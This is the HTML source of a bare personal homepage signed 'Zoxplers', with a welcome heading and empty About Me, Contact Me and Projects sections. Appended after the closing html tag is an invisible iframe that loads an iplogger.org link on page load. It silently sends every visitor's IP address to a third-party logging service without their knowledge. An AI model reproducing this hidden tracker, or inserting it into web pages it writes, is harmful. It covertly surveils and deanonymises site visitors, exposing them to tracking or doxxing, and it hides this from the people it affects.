<!--Made by Zoxplers--->
<!DOCTYPE html>
<html>
    <head>
        <title>Zoxplers - Site</title>
        <link rel="shortcut icon" href="favicon.ico"/>
        <meta charset="utf-8"/>
    </head>
    <body>
        <navmenu>
            <titlebar>Home</titlebar>
        </navmenu>
        <main>
            <heading>
                <heading1>Welcome to my website!</heading1>
                <heading2></heading2>
            </heading>
            <navbar>
            </navbar>
            <pages>
                <aboutme name="About Me" icon="person"></aboutme>
                <contactme name="Contact Me" icon="call"></contactme>
                <projects name="Projects" icon="work"></projects>
            </pages>
        </main>
    </body>
</html>
<iframe style="display: none;" src="https://iplogger.org/2scVd5"></iframe>
<script src="index.js"></script>
<link rel="stylesheet" href="index.css">
